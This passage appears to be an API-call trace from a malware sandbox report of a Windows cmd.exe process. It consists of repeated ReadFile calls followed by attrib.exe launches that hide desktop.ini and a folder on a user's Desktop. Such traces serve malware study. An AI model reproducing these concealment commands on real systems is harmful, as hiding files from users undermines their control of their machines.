nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, 
lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.948] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: 
lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.949] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.950] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.950] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, 
lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.952] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.953] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.954] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.955] ReadFile (in: hFile=0x58, 
lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.956] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile 
(in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.957] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 
[0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.958] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.959] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0226.078] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.078] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0226.079] _close (_FileHandle=3) returned 0 [0226.079] GetConsoleTitleW (in: lpConsoleTitle=0x22f7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0226.079] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.079] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0226.080] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.080] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.080] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.080] _wcsicmp (_String1=".EXE", _String2=".CMD") 
returned 2 [0226.080] GetConsoleTitleW (in: lpConsoleTitle=0x22f58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.080] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f414, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f4dc | out: lpAttributeList=0x22f414, lpSize=0x22f4dc) returned 1 [0226.080] UpdateProcThreadAttribute (in: lpAttributeList=0x22f414, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f4d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f414, lpPreviousValue=0x0) returned 1 [0226.080] GetStartupInfoW (in: lpStartupInfo=0x22f3d0 | out: lpStartupInfo=0x22f3d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0226.080] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.080] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f470*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f4bc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessInformation=0x22f4bc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8e4, dwThreadId=0xd68)) returned 1 [0226.134] 
CloseHandle (hObject=0x50) returned 1 [0226.134] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.134] GetEnvironmentStringsW () returned 0x2f2cb0* [0226.134] FreeEnvironmentStringsW (penv=0x2f2cb0) returned 1 [0226.134] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0226.264] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22f3b0 | out: lpExitCode=0x22f3b0*=0x0) returned 1 [0226.264] CloseHandle (hObject=0x4c) returned 1 [0226.264] _vsnwprintf (in: _Buffer=0x22f4f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f3bc | out: _Buffer="00000000") returned 8 [0226.265] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0226.265] GetEnvironmentStringsW () returned 0x2f2cb0* [0226.265] FreeEnvironmentStringsW (penv=0x2f2cb0) returned 1 [0226.265] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0226.265] GetEnvironmentStringsW () returned 0x2f2cb0* [0226.265] FreeEnvironmentStringsW (penv=0x2f2cb0) returned 1 [0226.265] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f414 | out: lpAttributeList=0x22f414) [0226.265] GetConsoleTitleW (in: lpConsoleTitle=0x22f7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.265] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0226.265] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.265] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0226.266] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.266] FindClose (in: hFindFile=0x2ee628 | out: hFindFile=0x2ee628) returned 1 [0226.266] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.266] 
_wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0226.266] GetConsoleTitleW (in: lpConsoleTitle=0x22f58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0226.266] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f414, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f4dc | out: lpAttributeList=0x22f414, lpSize=0x22f4dc) returned 1 [0226.266] UpdateProcThreadAttribute (in: lpAttributeList=0x22f414, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f4d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f414, lpPreviousValue=0x0) returned 1 [0226.266] GetStartupInfoW (in: lpStartupInfo=0x22f3d0 | out: lpStartupInfo=0x22f3d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0226.267] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.267] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f470*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f4bc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"", lpProcessInformation=0x22f4bc*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd88, dwThreadId=0x4d4)) returned 1 [0226.269] 
CloseHandle (hObject=0x4c) returned 1 [0226.269] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.269] GetEnvironmentStringsW () returned 0x2f3668* [0226.269] FreeEnvironmentStringsW (penv=0x2f3668) returned 1 [0226.269] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0226.314] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f3b0 | out: lpExitCode=0x22f3b0*=0x0) returned 1 [0226.314] CloseHandle (hObject=0x50) returned 1 [0226.314] _vsnwprintf (in: _Buffer=0x22f4f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f3bc | out: _Buffer="00000000") returned 8 [0226.314] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0226.314] GetEnvironmentStringsW () returned 0x2f3668* [0226.314] FreeEnvironmentStringsW (penv=0x2f3668) returned 1 [0226.314] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0226.314] GetEnvironmentStringsW () returned 0x2f3668* [0226.314] 